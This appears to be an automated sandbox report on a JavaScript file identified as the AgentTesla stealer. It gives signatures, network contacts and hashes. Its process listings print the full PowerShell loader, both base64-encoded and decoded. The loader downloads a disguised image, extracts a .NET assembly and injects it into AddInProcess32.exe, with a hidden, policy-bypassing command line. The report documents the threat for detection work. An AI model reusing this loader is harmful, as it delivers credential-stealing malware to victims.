Analysis Overview
SHA256
ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b
Threat Level: Known bad
The file ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b.js was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Looks up external IP address via web service
Suspicious use of SetThreadContext
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-10 11:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-10 11:26
Reported
2024-06-10 11:29
Platform
win7-20240221-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2220 wrote to memory of 2580 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2220 wrote to memory of 2580 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2220 wrote to memory of 2580 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2580 wrote to memory of 1664 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2580 wrote to memory of 1664 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2580 wrote to memory of 1664 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0gKFtzdHJpbmdbXV0kbGlua3MpICR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkZG93bmxvYWRlZERhdGEgPSBAKCk7ICRzaHVmZmxlZExpbmtzID0gJGxpbmtzIHwgR2V0LVJhbmRvbSAtQ291bnQgJGxpbmtzLkxlbmd0aDsgZm9yZWFjaCAoJGxpbmsgaW4gJHNodWZmbGVkTGlua3MpIHsgdHJ5IHsgJGRvd25sb2FkZWREYXRhICs9ICR3ZWJDbGllbnQuRG93bmxvYWREYXRhKCRsaW5rKSB9IGNhdGNoIHsgY29udGludWUgfSB9OyByZXR1cm4gJGRvd25sb2FkZWREYXRhIH07ICRsaW5rcyA9IEAoJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5NC84OTgvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE3ODU1OTQ4JywgJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5NC84OTgvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE3ODU1OTQ4Jyk7ICRpbWFnZUJ5dGVzID0gRG93bmxvYWREYXRhRnJvbUxpbmtzICRsaW5rczsgaWYgKCRpbWFnZUJ5dGVzIC1uZSAkbnVsbCkgeyAkaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGltYWdlQnl0ZXMpOyAkc3RhcnRGbGFnID0gJzw8QkFTRTY0X1NUQVJUPj4nOyAkZW5kRmxhZyA9ICc8PEJBU0U2NF9FTkQ+Pic7ICRzdGFydEluZGV4ID0gJGltYWdlVGV4dC5JbmRleE9mKCRzdGFydEZsYWcpOyAkZW5kSW5kZXggPSAkaW1hZ2VUZXh0LkluZGV4T2YoJGVuZEZsYWcpOyBpZiAoJHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAkZW5kSW5kZXggLWd0ICRzdGFydEluZGV4KSB7ICRzdGFydEluZGV4ICs9ICRzdGFydEZsYWcuTGVuZ3RoOyAkYmFzZTY0TGVuZ3RoID0gJGVuZEluZGV4IC0gJHN0YXJ0SW5kZXg7ICRiYXNlNjRDb21tYW5kID0gJGltYWdlVGV4dC5TdWJzdHJpbmcoJHN0YXJ0SW5kZXgsICRiYXNlNjRMZW5ndGgpOyAkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkYmFzZTY0Q29tbWFuZCk7ICRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGNvbW1hbmRCeXRlcyk7ICR0eXBlID0gJGxvYWRlZEFzc2VtYmx5LkdldFR5cGUoJ1J1blBFLkhvbWUnKTsgJG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dICgndHh0LmVwLzE3LjkzLjMyMS4zOS8vOnB0dGgnICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nLCdBZGRJblByb2Nlc3MzMicsJ2Rlc2F0aXZhZG8nKSl9fQ==';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/794/898/original/new_image.jpg?1717855948', 'https://uploaddeimagens.com.br/images/004/794/898/original/new_image.jpg?1717855948'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ep/17.93.321.39//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))}}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 104.21.84.67:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | uploaddeimagens.com.br | udp |
| US | 104.21.45.138:443 | uploaddeimagens.com.br | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 23.63.101.153:80 | apps.identrust.com | tcp |
Files
memory/2580-20-0x000007FEF628E000-0x000007FEF628F000-memory.dmp
memory/2580-22-0x0000000000670000-0x0000000000678000-memory.dmp
memory/2580-25-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
memory/2580-24-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
memory/2580-23-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
memory/2580-27-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
memory/2580-26-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
memory/2580-21-0x000000001B700000-0x000000001B9E2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TJSTGYOGL36EIKQTS6X4.temp
| MD5 | 4a827a117708c242a96a6cc938a2c837 |
| SHA1 | 088b844b85ad639660a130e0629023dafaa2a9bd |
| SHA256 | f792d54d061a1316243948c2a847ca9c0e679fca437c37d3d58040944b40a4c3 |
| SHA512 | 9f43318f31e8ea4aaafbbe8a91fe8b85ee06585ee761454d6a7a1251411450c01bafea135450c9edee7a8961daf432d7eaa3902cf870b5b5114b98cdf6c04223 |
C:\Users\Admin\AppData\Local\Temp\Tar2E06.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\Local\Temp\Cab2DF3.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2bd01f614a72e4cd4a932a7f852b8042 |
| SHA1 | 770b7758a7a9b85c5a504fbae1cb7e674c1a4446 |
| SHA256 | 15c6691d90b2b1f8a8e56faeae2ff72120fc4f8ace435d9bca22f30366350235 |
| SHA512 | a04e4f4fe469933f2ae6a955b50fecba19a358a730e512e0042023cba481ced4516931d59db55744b3e291e73f6d4191a2dcd404d06ec91bc5298d5ecc511635 |
C:\Users\Admin\AppData\Local\Temp\Tar32DC.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 671bd0dfab4bf5681f03b147b4ab690b |
| SHA1 | 5bf69518848cc1654174c4c6a84ffb50932ff786 |
| SHA256 | a878a62f28d1c4ced8202bf0b53932b5d8294cec451af0829529e74d65270758 |
| SHA512 | 8fd6208e0f993f0a9293aafec198dd829fc83399368ddaf23c9b558acefa9f4823756fd71d84be2958ae55865d9d638ddce621f527a12610d7c9d85baa3d444d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/1664-100-0x000000001AE60000-0x000000001B04E000-memory.dmp
memory/2580-101-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-10 11:26
Reported
2024-06-10 11:29
Platform
win10v2004-20240508-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1816 set thread context of 1764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0gKFtzdHJpbmdbXV0kbGlua3MpICR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkZG93bmxvYWRlZERhdGEgPSBAKCk7ICRzaHVmZmxlZExpbmtzID0gJGxpbmtzIHwgR2V0LVJhbmRvbSAtQ291bnQgJGxpbmtzLkxlbmd0aDsgZm9yZWFjaCAoJGxpbmsgaW4gJHNodWZmbGVkTGlua3MpIHsgdHJ5IHsgJGRvd25sb2FkZWREYXRhICs9ICR3ZWJDbGllbnQuRG93bmxvYWREYXRhKCRsaW5rKSB9IGNhdGNoIHsgY29udGludWUgfSB9OyByZXR1cm4gJGRvd25sb2FkZWREYXRhIH07ICRsaW5rcyA9IEAoJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5NC84OTgvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE3ODU1OTQ4JywgJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5NC84OTgvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE3ODU1OTQ4Jyk7ICRpbWFnZUJ5dGVzID0gRG93bmxvYWREYXRhRnJvbUxpbmtzICRsaW5rczsgaWYgKCRpbWFnZUJ5dGVzIC1uZSAkbnVsbCkgeyAkaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGltYWdlQnl0ZXMpOyAkc3RhcnRGbGFnID0gJzw8QkFTRTY0X1NUQVJUPj4nOyAkZW5kRmxhZyA9ICc8PEJBU0U2NF9FTkQ+Pic7ICRzdGFydEluZGV4ID0gJGltYWdlVGV4dC5JbmRleE9mKCRzdGFydEZsYWcpOyAkZW5kSW5kZXggPSAkaW1hZ2VUZXh0LkluZGV4T2YoJGVuZEZsYWcpOyBpZiAoJHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAkZW5kSW5kZXggLWd0ICRzdGFydEluZGV4KSB7ICRzdGFydEluZGV4ICs9ICRzdGFydEZsYWcuTGVuZ3RoOyAkYmFzZTY0TGVuZ3RoID0gJGVuZEluZGV4IC0gJHN0YXJ0SW5kZXg7ICRiYXNlNjRDb21tYW5kID0gJGltYWdlVGV4dC5TdWJzdHJpbmcoJHN0YXJ0SW5kZXgsICRiYXNlNjRMZW5ndGgpOyAkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkYmFzZTY0Q29tbWFuZCk7ICRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGNvbW1hbmRCeXRlcyk7ICR0eXBlID0gJGxvYWRlZEFzc2VtYmx5LkdldFR5cGUoJ1J1blBFLkhvbWUnKTsgJG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dICgndHh0LmVwLzE3LjkzLjMyMS4zOS8vOnB0dGgnICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nLCdBZGRJblByb2Nlc3MzMicsJ2Rlc2F0aXZhZG8nKSl9fQ==';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/794/898/original/new_image.jpg?1717855948', 'https://uploaddeimagens.com.br/images/004/794/898/original/new_image.jpg?1717855948'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ep/17.93.321.39//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))}}"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 104.21.84.67:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.84.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.214.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | uploaddeimagens.com.br | udp |
| US | 172.67.215.45:443 | uploaddeimagens.com.br | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.215.67.172.in-addr.arpa | udp |
| BG | 93.123.39.71:80 | 93.123.39.71 | tcp |
| US | 8.8.8.8:53 | 71.39.123.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.73.42.20.in-addr.arpa | udp |
Files
memory/4968-9-0x00007FFB50DF3000-0x00007FFB50DF5000-memory.dmp
memory/4968-15-0x00000173EA5C0000-0x00000173EA5E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_351f2t1c.eza.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4968-20-0x00007FFB50DF0000-0x00007FFB518B1000-memory.dmp
memory/4968-21-0x00007FFB50DF0000-0x00007FFB518B1000-memory.dmp
memory/1816-31-0x000001FDFEDC0000-0x000001FDFEFAE000-memory.dmp
memory/1764-32-0x0000000000400000-0x0000000000442000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0f6a3762a04bbb03336fb66a040afb97 |
| SHA1 | 0a0495c79f3c8f4cb349d82870ad9f98fbbaac74 |
| SHA256 | 36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383 |
| SHA512 | cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f41839a3fe2888c8b3050197bc9a0a05 |
| SHA1 | 0798941aaf7a53a11ea9ed589752890aee069729 |
| SHA256 | 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a |
| SHA512 | 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699 |
memory/4968-38-0x00007FFB50DF0000-0x00007FFB518B1000-memory.dmp
memory/1764-39-0x00000000056B0000-0x0000000005C54000-memory.dmp
memory/1764-40-0x0000000005170000-0x00000000051D6000-memory.dmp
memory/1764-41-0x00000000063F0000-0x0000000006440000-memory.dmp
memory/1764-42-0x00000000064E0000-0x0000000006572000-memory.dmp
memory/1764-43-0x0000000006460000-0x000000000646A000-memory.dmp